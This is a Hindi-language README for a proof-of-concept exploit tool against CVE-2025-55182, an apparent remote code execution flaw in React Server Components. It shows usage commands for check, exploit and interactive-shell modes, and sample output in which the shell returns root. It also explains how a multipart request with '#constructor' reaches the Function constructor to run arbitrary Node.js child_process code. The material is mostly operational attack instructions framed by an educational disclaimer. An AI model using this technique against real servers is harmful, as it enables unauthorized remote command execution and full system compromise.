
CVE-2025-55182 के लिए Poc
CVE-2025-55182 के लिए प्रमाण-अवधारणा
Usage: python3 poc.py -u http://target.com --cmd "<cmd_here>"
यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है। बिना पूर्व आपसी सहमति के लक्ष्यों पर हमला करने के लिए इस उपकरण का उपयोग अवैध है। डेवलपर कोई दायित्व नहीं लेता है और इस प्रोग्राम के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
pip install requests
आप उपकरण को तीन मोड में चला सकते हैं: जाँच, शोषण, या इंटरएक्टिव शेल।
usage: poc.py [-h] [-u URL] [--id ID] [-c CMD] [--check]
options:
-h, --help show this help message and exit
-u URL Target URL (e.g., http://localhost:3000)
--id ID Target Server Action ID (default: user-profile-action)
-c CMD, --cmd CMD Command to execute directly (non-interactive mode)
--check Only check for vulnerability (Crash Method), do not exploit
python3 poc.py -u http://target-site.com --check
python3 poc.py -u http://target-site.com --cmd "id"
python3 poc.py
# शेल के अंदर
RSC-Shell> set url http://localhost:3000
[+] URL सेट किया गया: http://localhost:3000
RSC-Shell> check
[+] लक्ष्य असुरक्षित है!
RSC-Shell> shell
[*] स्यूडो-इंटरएक्टिव शेल शुरू हो रहा है। वापस जाने के लिए 'exit' का उपयोग करें।
cmd> whoami
root
जाँच: इंडेक्स 1 पर {} को परिभाषित करते हुए एक मल्टीपार्ट अनुरोध भेजता है, और ["$1🅰️a"] तक पहुँचने का प्रयास करता है। अपैच्ड सर्वर undefined के गुण a तक पहुँचने का प्रयास करते समय क्रैश (HTTP 500) करते हैं। पैच किए गए सर्वर HTTP 200 लौटाते हैं।
शोषण: मान्य क्रिया आईडी का संदर्भ देते हुए एक मल्टीपार्ट अनुरोध भेजता है, लेकिन #constructor जोड़ता है। यह सीरियलाइज़र को फंक्शन कंस्ट्रक्टर लौटाने के लिए धोखा देता है, जिससे हम सर्वर पर निष्पादित होने के लिए मनमाना जावास्क्रिप्ट (Node.js child_process) पास कर सकते हैं।